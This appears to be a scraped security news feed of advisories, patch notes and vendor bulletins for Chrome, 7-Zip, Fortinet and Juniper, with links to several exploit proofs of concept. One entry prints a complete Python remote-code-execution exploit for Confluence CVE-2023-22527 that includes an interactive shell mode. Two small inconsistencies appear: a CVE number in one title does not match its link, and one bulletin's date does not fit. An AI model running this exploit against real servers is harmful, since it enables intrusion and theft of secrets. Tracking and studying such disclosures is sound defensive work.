Most recent comment.

Stable Channel Update for Desktop Tuesday, January 7, 2025

2025-02-22T13:58:43.195613+00:00

The Stable channel has been updated to 131.0.6778.264/.265 for Windows, Mac and 131.0.6778.264 for Linux which will roll out over the coming days/weeks. A full list of changes in this build is available in the Log. Security Fixes and Rewards Note: Access to bug details and links may be kept restricted until a majority of users are updated with a fix. We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven’t yet fixed. This update includes 4 security fixes. Below, we highlight fixes that were contributed by external researchers. Please see the Chrome Security Page for more information. [383356864](https://issues.chromium.org/issues/383356864) High CVE-2025-0291: Type Confusion in V8. Reported by Popax21 on 2024-12-11 We would also like to thank all security researchers that worked with us during the development cycle to prevent security bugs from ever reaching the stable channel.As usual, our ongoing internal security work was responsible for a wide range of fixes: - [388088544] Various fixes from internal audits, fuzzing and other initiatives Many of our security bugs are detected using AddressSanitizer, MemorySanitizer, UndefinedBehaviorSanitizer, Control Flow Integrity, libFuzzer, or AFL. Reference: [https://chromereleases.googleblog.com/2025/01/stable-channel-update-for-desktop.html](https://chromereleases.googleblog.com/2025/01/stable-channel-update-for-desktop.html)

CVE-2023-4047 PoC By Wild Pointer

2025-02-22T13:58:43.195502+00:00

- [https://github.com/wildptr-io/Winrar-CVE-2023-40477-POC](https://github.com/wildptr-io/Winrar-CVE-2023-40477-POC)

POC for CVE-2023-22527 (Confluence SSTI) - Struts2

2025-02-22T13:58:43.195382+00:00

~~~python import requests import argparse class exploit: def __init__(self, url): self.url = url def rce(self, cmd='', header='Ret-rce'): data = 'label=\\u0027%2b#request\\u005b\\u0027.KEY_velocity.struts2.context\\u0027\\u005d.internalGet(\\u0027ognl\\u0027).findValue(#parameter s.x,{})%2b\\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().getWriter().write((new freemarker.template.utility.Execute()).exec({"'+cmd+'"}))\r\ n' r = requests.post(f'{self.url}/template/aui/text-inline.vm', data=data, headers = { 'Connection': 'close', 'Content-Type': 'application/x-www-form-urlencoded', 'Content-Length': str(len(data)) } ) return r.text.split('')[0].strip() def get_env(self): return self.rce(cmd='env') def shell(self): print('[DEBUG] Spawning semi-interactive shell ..') while 1: cmd = input('$ ') result = self.rce(cmd) print(result) def parse_args(): parser = argparse.ArgumentParser(add_help=True, description='This is a POC for CVE-2023-22527 (Confluence SSTI)') parser.add_argument("-u",dest="url",type=str,required=False, help="Url") parser.add_argument("-c",dest="command",type=str,required=False, default=None,help="Command") parser.add_argument("-e",dest="env",action="store_true",required=False,default=False, help="Get environnement vars") parser.add_argument("-i",dest="interactive",action="store_true",required=False,default=False, help="Interactive mod") return parser.parse_args() def main(args): if args.command is None and not args.env and not args.interactive: print('[ERROR] Please provide a command using -c option') exp = exploit(url = args.url) if args.env: res = exp.get_env() print(res) if args.command: res = exp.rce(args.command) print(res) if args.interactive: exp.shell() if __name__ == '__main__': args = parse_args() main(args = args) ~~~

PoC - Microsoft Configuration Manager (ConfigMgr / SCCM) 2403 Unauthenticated SQL injections (CVE-2024-43468) exploit

2025-02-22T13:58:43.195250+00:00

[Microsoft Configuration Manager (ConfigMgr / SCCM) 2403 Unauthenticated SQL injections (CVE-2024-43468) exploit](https://github.com/synacktiv/CVE-2024-43468)

7-Zip File Manager didn't propagate Zone.Identifier stream for extracted files from nested archives

2025-02-22T13:58:43.195121+00:00

~~~ 24.09 2024-11-29 ------------------------- - The default dictionary size values for LZMA/LZMA2 compression methods were increased: dictionary size compression level v24.08 v24.09 v24.09 32-bit 64-bit 8 MB 16 MB 16 MB -mx4 16 MB 32 MB 32 MB -mx5 : Normal 32 MB 64 MB 64 MB -mx6 32 MB 64 MB 128 MB -mx7 : Maximum 64 MB 64 MB 256 MB -mx8 64 MB 64 MB 256 MB -mx9 : Ultra The default dictionary size values for 32-bit versions of LZMA/LZMA2 don't exceed 64 MB. - 7-Zip now can calculate the following hash checksums: SHA-512, SHA-384, SHA3-256 and MD5. - APM and HFS support was improved. - If an archive update operation uses a temporary archive folder and the archive is moved to the destination folder, 7-Zip shows the progress of moving the archive file, as this operation can take a long time if the archive is large. - The bug was fixed: 7-Zip File Manager didn't propagate Zone.Identifier stream for extracted files from nested archives (if there is open archive inside another open archive). - Some bugs were fixed. ~~~ [https://sourceforge.net/p/sevenzip/discussion/45797/thread/b95432c7ac/](https://sourceforge.net/p/sevenzip/discussion/45797/thread/b95432c7ac/)

PoC - AMD EPYC 7B13 64-Core Processor (Milan) and AMD Ryzen 9 7940HS w/ Radeon 780M Graphics (Phoenix).

2025-02-22T13:58:43.194993+00:00

- [PoC Tested on AMD EPYC 7B13 64-Core Processor (Milan) and AMD Ryzen 9 7940HS w/ Radeon 780M Graphics (Phoenix).](https://github.com/google/security-research/tree/master/pocs/cpus/entrysign) We've provided these PoCs to demonstrate that this vulnerability allows an adversary to produce arbitrary microcode patches. They cause the RDRAND instruction to always return the constant 4, but also set the carry flag (CF) to 0 to indicate that the returned value is invalid. Because correct use of the RDRAND instruction requires checking that CF is 1, this PoC can not be used to compromise correctly functioning confidential computing workloads. Additional tools and resources will be made public on March 5.

Clarification from Fortinet

2025-02-22T13:58:43.194837+00:00

UPDATE: Fortinet has informed us that the new CVE-2025-24472 flaw added to FG-IR-24-535 today is not a zero-day and was already fixed in January, but not disclosed then. Furthermore, even though the current advisory states that the listed flaws were exploited in attacks and includes workarounds, Fortinet says that only CVE-2024-55591, and not CVE-2025-24472. It appears that this new CVE is for a different pathway to exploiting the bug that was not previously disclosed and was just now added to the Fortinet advisory about the active exploitation of CVE-2024-55591, causing the confusion. We have updated this previous toot, changed the title of our article, and added an update to prevent confusion. Ref: https://infosec.exchange/@BleepingComputer/113986777248862223

Fortinet Clarification

2025-02-22T13:58:43.194679+00:00

securityonline.info - Chrome Update Addresses High-Severity Vulnerability: CVE-2025-0291

2025-02-22T13:58:43.194479+00:00

# Chrome Update Addresses High-Severity Vulnerability: CVE-2025-0291 Ref: [https://securityonline.info/chrome-update-addresses-high-severity-vulnerability-cve-2025-0291/](https://securityonline.info/chrome-update-addresses-high-severity-vulnerability-cve-2025-0291/) Google has just released a critical security update for its Chrome web browser, addressing a high-severity vulnerability that could leave users open to attack. The update, rolling out to Windows, Mac, and Linux users over the next few days, patches a “Type Confusion” flaw in V8, the JavaScript engine that powers Chrome. This vulnerability, tracked as CVE-2025-0291, was discovered by security researcher Popax21 and reported to Google on December 11th, 2024. Type Confusion vulnerabilities are particularly dangerous as they can allow attackers to execute malicious code on a user’s system. This can lead to a range of consequences, from data theft and system crashes to complete takeover of the affected device. Google has awarded a bounty of $55,000 to Popax21 for the discovery and responsible disclosure of the bug. Type Confusion vulnerabilities occur when a program mistakenly treats data as a different type than originally intended. In the context of V8, this can lead to out-of-bounds memory access, allowing attackers to manipulate memory, crash the browser, or execute arbitrary code. Such vulnerabilities are often exploited in sophisticated attacks, making their timely resolution critical for user safety. Google urges all users to update their Chrome browsers to the latest version (131.0.6778.264/.265 for Windows and Mac, 131.0.6778.264 for Linux) as soon as possible. Here’s how: 1. **Open Chrome.** 2. **Click the three vertical dots** in the top right corner. 3. Go to **Help > About Google Chrome.** 4. Chrome will automatically **check for updates** and install the latest version. 5. **Relaunch Chrome** to complete the update. ### Related Posts: * [New Chrome 0-Day Bug Under Active Attack](https://securityonline.info/cve-2022-4262-chrome-0-day-vulnerability/) * [New WiFi Flaw Leaves All Devices Vulnerable to ‘SSID Confusion’ Attacks](https://securityonline.info/cve-2023-52424-new-wifi-flaw-leaves-all-devices-vulnerable-to-ssid-confusion-attacks/) * [Chrome will no longer flag HTTPS pages as secure sites](https://securityonline.info/chrome-will-no-longer-flag-https-pages-as-secure-sites/)

2025-02: Out-of-Cycle Security Bulletin: Session Smart Router, Session Smart Conductor, WAN Assurance Router: API Authentication Bypass Vulnerability (CVE-2025-21589)

2025-02-22T13:58:43.192356+00:00

This issue affects Session Smart Router, Session Smart Conductor, WAN Assurance Managed Router. Severity Critical Severity Assessment (CVSS) Score CVSS: v3.1: 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) SEVERITY:CRITICAL CVSS: v4.0: 9.3 (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N) SEVERITY:CRITICAL Problem An Authentication Bypass Using an Alternate Path or Channel vulnerability in Juniper Networks Session Smart Router may allow a network-based attacker to bypass authentication and take administrative control of the device. This issue affects Session Smart Router: from 5.6.7 before 5.6.17, from 6.0.8, from 6.1 before 6.1.12-lts, from 6.2 before 6.2.8-lts, from 6.3 before 6.3.3-r2; This issue affects Session Smart Conductor: from 5.6.7 before 5.6.17, from 6.0.8, from 6.1 before 6.1.12-lts, from 6.2 before 6.2.8-lts, from 6.3 before 6.3.3-r2; This issue affects WAN Assurance Managed Routers: from 5.6.7 before 5.6.17, from 6.0.8, from 6.1 before 6.1.12-lts, from 6.2 before 6.2.8-lts, from 6.3 before 6.3.3-r2. Juniper SIRT is not aware of any malicious exploitation of this vulnerability. This issue was found during internal product security testing or research Solution The following software releases have been updated to resolve this issue: Session Smart Router: SSR-5.6.17, SSR-6.1.12-lts, SSR-6.2.8-lts, SSR-6.3.3-r2 and subsequent releases. It is suggested to upgrade all affected systems to one of these versions of software. In a Conductor-managed deployment, it is sufficient to upgrade only the Conductor nodes and the fix will be applied automatically to all connected routers. As practical, the routers should still be upgraded to a fixed version however they will not be vulnerable once they connect to an upgraded Conductor. Router patching can be confirmed once the router reaches the “running" (on 6.2 and earlier) or “synchronized” (on 6.3+) state on the Conductor". This vulnerability has been patched automatically on devices that operate with WAN Assurance (where configuration is also managed) connected to the Mist Cloud. As practical, the routers should still be upgraded to a version containing the fix. It is important to note that when the fix is applied automatically on routers managed by a Conductor or on WAN assurance, it will have no impact on data-plane functions of the router. The application of the fix is non-disruptive to production traffic. There may be a momentary downtime (less than 30 seconds) to the web-based management and APIs. This issue is being tracked as I95-59677. Note: Juniper SIRT's policy is not to evaluate releases which are beyond End of Engineering (EOE) or End of Life (EOL). Workaround There are no known workarounds for this issue. Severity Assessment Information for how Juniper Networks uses CVSS can be found at KB 16446 "Common Vulnerability Scoring System (CVSS) and Juniper's Security Advisories." Modification History 2024-02-11: Initial Publication Related Information KB16613: Overview of the Juniper Networks SIRT Quarterly Security Bulletin Publication Process KB16765: In which releases are vulnerabilities fixed? KB16446: Common Vulnerability Scoring System (CVSS) and Juniper's Security Advisories Report a Security Vulnerability - How to Contact the Juniper Networks Security Incident Response Team